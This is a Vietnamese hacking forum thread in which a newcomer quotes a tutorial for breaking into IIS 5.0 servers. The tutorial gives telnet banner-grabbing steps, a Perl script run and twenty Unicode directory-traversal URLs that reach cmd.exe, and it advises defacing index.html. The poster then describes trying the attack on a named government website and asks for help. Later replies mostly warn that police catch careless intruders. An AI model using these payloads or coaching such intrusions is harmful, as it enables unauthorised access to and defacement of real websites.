English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Giúp chỉ ra lỗi sai của mình trong cách Hack IIS5.0 Này!  XML
  [Question]   Giúp chỉ ra lỗi sai của mình trong cách Hack IIS5.0 Này! 10/01/2007 01:59:53 (+0700) | #1 | 35293
521241792261
Member
[Minus]    0    [Plus]
Joined: 03/01/2007 12:43:02
Messages: 30
Offline
[Profile] [PM]
Chào mấy bạn mình là thành viên còn mới chưa hiểu biết lắm nên rất mong các bạn chỉ giáo:
Mình có đọc bài viết này:
49.) Kỹ thuật hack IIS server 5.0 :

_ IIS server với các phiên bản từ trước đến phiên bản 5.0 đều có lỗi để ta có thể khai thác , do bây giờ hầu hết mọi người đều dùng IIS server 5.0 nên lỗi ở các phiên bản trước tôi không đề cập đến . Bây giờ tôi sẽ bày các bạn cách hack thông qua công cụ activeperl và IE , các bạn có thể vận dụng cho các trang Web ở VN vì chúng bị lỗi này rất nhiều . Ta hãy bắt đầu nhé .
_ Trước hết các bạn hãy download activeperl và Unicode.pl .
_ Sử dụng telnet để xác định trang Web ta tấn công có sử dụng IIS server 5.0 hay không :

CODE
telnet < tên trang Web > 80
GET HEAD / HTTP/1.0


Nếu nó không báo cho ta biết mục tiêu đang sử dụng chương trình gì thì các bạn hãy thay đổi cổng 80 bằng các cổng khác như 8080, 81, 8000, 8001 .v.v…
_ Sau khi đã xác định được mục tiêu các bạn vào DOS gõ :

CODE
perl unicode.pl
Host: ( gõ địa chỉ server mà các bạn muốn hack )
Port: 80 ( hoặc 8080, 81, 8000, 8001 tuỳ theo cổng mà ta đã telnet trước đó ) .


_ Các bạn sẽ thấy bảng liệt kê lỗi ( đã được lập trình trong Unicode.pl ) như sau :

CODE
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.ex e?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe ?/c+
[13]/scripts/..%fc%80%80%80%80%af../winnt/system32/ cmd.exe?/c+
[14]/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0 \%80\%af../winnt/system32/cmd.exe?/c+
[15]/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+
[16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+
[17]/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c 0%af../winnt/system32/cmd.exe?/c+
[18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+
[19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+
[20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c 0%af../winnt/system32/cmd.exe?/c+


Các bạn sẽ thấy được tất cả các lỗi trên nếu trang Web nạn nhân bị tất cả những lỗi như vậy , nếu server của nạn nhân chỉ bị lỗi thứ 13 và 17 thì bảng kết quả chỉ xuất hiện dòng thứ 13 và 17 mà thôi .
Tôi lấy VD là bảng kết quả cho tôi biết trang Web nạn nhân bị lỗi thứ 3 và 7 , tôi sẽ ra IE và nhập đoạn mã tương ứng trên Address :

http://www.xxx.com/scripts/..%c1%p c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 3
hoặc
http://www.xxx.com/scripts/..%c1%1 c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 7

Đến đây các bạn đã có thể xâm nhập vào server của nạn nhân rồi đó , các bạn hãy sử dụng lệnh trong DOS mà khai thác thông tin trong này . Thông thường các trang Web nằm ở thư mục vinetpub\wwwroot , các bạn vào được rồI thì chỉ cần thay index.html vớI tên hack by …. Là được rồi , đừng quậy họ nhé .

GOOKLUCK!!!!!!!!!!!!!!!

( Hết phần 8 )
Tài Liệu HVA
Mình thấy nhiều bạn nói cách hack này lỗi thời nhưng mình đã thử và thấy rất nhiều Web sử dụng Server IIS 5.0, Mình đã thử làm với 1 trang web
Mình VD ở đây là www.binhduong.gov.vn
Mình đã làm các thao tác sau:
Bước 1: dowload Activeperl
Bước 2:Telnet www.binhduong.gov.vn 80
Ở đây đã cho mình biết máy chủ sử dụng IIS 5.0, Hiện ra như sau:
HTTP/1.1 400 Bad Request
Server: Microsoft - IIS/5.0
Date:
Content-type: Text/html
Content-Length: 87
Bước 3: Tôi tiếp tục đánh câu lệnh như bài viết:
Perl unicode.pl www.binhduong.gov.vn 80
nhưng nó không hiện ra các dòng lỗi mà ra như sau:
Can't open Perl script "unicode.pl": No Such file or directory
Vậy mấy bạn có thể chỉ ra lỗi sai của mình được không, và ở đây nếu bạn nào có nhã ý có thể chỉ giúp mình thêm số kiến thức được không, nếu được thì cho mình tên và số dt nha!
Rất mong được sự giúp đỡ của các bạn!
[Up] [Print Copy]
  [Question]   Giúp chỉ ra lỗi sai của mình trong cách Hack IIS5.0 Này! 10/01/2007 06:41:04 (+0700) | #2 | 35342
[Avatar]
 conmale
Administrator
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

521241792261 wrote:
......
nhưng nó không hiện ra các dòng lỗi mà ra như sau:
Can't open Perl script "unicode.pl": No Such file or directory
Vậy mấy bạn có thể chỉ ra lỗi sai của mình được không, và ở đây nếu bạn nào có nhã ý có thể chỉ giúp mình thêm số kiến thức được không, nếu được thì cho mình tên và số dt nha!
Rất mong được sự giúp đỡ của các bạn! 


Sai chỗ này. Thật ra cũng không phải sai mà thiếu căn bản, thiếu kiến thức sử dụng máy tính mà ra.

Đoạn màu đỏ ở trên báo rằng trên hệ thống của bồ không có cái gì gọi là "unicode.pl" cả. Ngay cả bồ đã có nó ở đâu đó trên disk nhưng bồ không vào đúng thư mục chứa nó hoặc ấn định đường dẫn (PATH) để chạy mà cứ nhắm mắt gõ lệnh thì chẳng bao giờ nó thực thi.

Những cái này toàn là kiến thức căn bản. Tôi đã trả lời bồ bài trước. Mong bồ đọc kỹ và suy tư về nó.

Chúc bồ thành công.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Giúp chỉ ra lỗi sai của mình trong cách Hack IIS5.0 Này! 17/01/2007 02:33:39 (+0700) | #3 | 36679
[Avatar]
 managerC15
Member
[Minus]    0    [Plus]
Joined: 16/01/2007 13:53:43
Messages: 25
Offline
[Profile] [PM]
Các bạn ah thiếu kiến thức căn bản rất nguy hiểm
VD
Đan TrươngX ------ vietco.com ---------> C15 túm gọn
Huy REMY ----------chodientu.com---------> C15 sờ gáy
gần đây nhất chú em hoc lop 11 cung bi tum haaa
Theo lời 1 quan chức cao cấp cua C15 bộ công an cho biết bị túm bởi những lỗi rất căn bản
tất cả mọi người lên cẩn thận nha
[Up] [Print Copy]
  [Question]   Re: Giúp chỉ ra lỗi sai của mình trong cách Hack IIS5.0 Này! 22/03/2007 11:01:59 (+0700) | #4 | 48497
ddc_online
Member
[Minus]    0    [Plus]
Joined: 27/12/2004 04:05:41
Messages: 6
Offline
[Profile] [PM]
C15 tìm ra thủ phạm là nhờ lỗi cơ bản và cả kinh nghiệm công an mà cái này khối bác ko biết smilie
vì thế .....
[Up] [Print Copy]
  [Question]   Re: Giúp chỉ ra lỗi sai của mình trong cách Hack IIS5.0 Này! 22/03/2007 22:44:52 (+0700) | #5 | 48580
[Avatar]
 gsmth
Elite Member
[Minus]    0    [Plus]
Joined: 15/02/2007 13:25:36
Messages: 749
Offline
[Profile] [PM] [WWW] [Yahoo!]

ddc_online wrote:
C15 tìm ra thủ phạm là nhờ lỗi cơ bản và cả kinh nghiệm công an mà cái này khối bác ko biết smilie
vì thế ..... 

Chính vì thế nếu còn gà hãy quay đầu là bờ. :wink:
[Up] [Print Copy]
  [Question]   Re: Giúp chỉ ra lỗi sai của mình trong cách Hack IIS5.0 Này! 23/03/2007 03:15:24 (+0700) | #6 | 48661
[Avatar]
 canh_nguyen
Elite Member
[Minus]    0    [Plus]
Joined: 23/08/2004 18:55:09
Messages: 775
Location: Broken dream
Offline
[Profile] [PM] [WWW] [Yahoo!] [MSN] [ICQ]

gsmth wrote:

Chính vì thế nếu còn gà hãy quay đầu là bờ. :wink:  


Cố bơi tiếp đến bờ cũng được nhưng cẩn thận không chết đuối smilie .
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|